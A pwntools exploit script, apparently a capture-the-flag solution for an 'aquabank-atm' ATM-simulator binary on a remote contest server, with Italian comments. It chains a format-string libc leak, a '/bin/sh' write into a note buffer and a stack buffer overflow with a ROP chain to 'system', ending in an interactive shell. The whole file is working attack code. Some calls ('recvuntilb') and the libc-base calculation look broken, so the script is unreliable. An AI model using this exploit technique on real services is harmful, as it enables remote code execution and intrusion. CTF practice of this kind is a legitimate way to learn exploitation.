from pwn import *

OFF = 128  # On withdrawal
# %25$lx
context.binary = elf = ELF("./aquabank-atm", checksec=False)
libc = ELF("libc.so.6", checksec=False)
# libc = ELF("/usr/lib/libc.so.6", checksec=False)
# p = process(elf.path)
p = remote("offsec.m0lecon.it", 13508)
PRINTF_GOT = elf.got["printf"]
# Uso printf per stamparmi il libc address
# Uso save note per salvarmi /bin/sh nel buffer
# Salvo indirizzo di libc e chiamo system con /bin/sh
p.recvuntil(b"> ")
p.sendline(b"1")
# payload = b"%114$p" (local offset)
payload = b"%74$p"  # (remote offset)
p.sendline(payload)
p.recvuntilb(b"> ")
p.sendline(b"2")
p.recvuntil(b"--- Your customer note ---\n")
addr = int(p.recvline().strip(), 16)
libc.address = addr
print(f"Address: {hex(addr)}")
# Stage 2 write the binsh string at a fixed address (note array)
binsh = b"/bin/sh"
note_addr = 0x4040A0
p.recvuntilb(b"> ")
p.sendline(b"1")
p.sendline(binsh)
print(p.recvuntilb(b"> "))
#
# Stage 3 Buffer overflow and system call
p.sendline(b"3")
print(p.recvuntil(b"From account: "))
p.sendline(b"A")
print(p.recvuntil(b"Amount: "))
p.sendline(b"10")
print(p.recvuntil(b"Withdrawal memo (be brief):\n"))
ret = 0x000000000040101A
ret_libc = 0x000000000002882F
pop_rdi = 0x000000000010F78B
payload = flat(
    b"A" * (OFF),
    # p64(ret),
    p64(libc.address + pop_rdi),
    p64(note_addr),
    p64(
        libc.symbols["system"],
    ),
)
p.sendline(payload)
p.interactive()
# %114$p
# %130$p